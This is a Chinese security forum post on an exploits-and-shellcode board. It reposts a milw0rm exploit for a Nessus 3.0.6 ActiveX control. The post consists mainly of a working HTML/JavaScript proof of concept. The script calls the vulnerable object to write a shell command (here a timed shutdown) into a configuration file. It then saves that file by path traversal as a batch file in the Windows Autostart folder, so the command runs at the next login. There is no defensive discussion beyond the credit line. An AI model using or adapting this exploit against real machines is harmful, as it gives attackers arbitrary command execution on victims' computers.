Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3923
精华: 128
积分: 209640
阅读权限: 200
性别: 男
在线时间: 1096 小时
注册时间: 2007-10-23
最后登录: 2008-7-23

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-8-12 12:47 只看该作者

Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit

复制内容到剪贴板

代码:

<HTML>

<!--

Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit

Bug discovered by Krystian Kloskowski (h07) <[email]h07@interia.pl[/email]>

Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish

Just for fun ;]

-->



<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>



<script language="javascript">

obj.addsetConfig(&#39;shutdown -t 1000 -s -c "hello world ;]" && pause&#39;, &#39;&#39;, &#39;&#39;);

obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");

</script>

</HTML>



# milw0rm.com [2007-07-27]

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit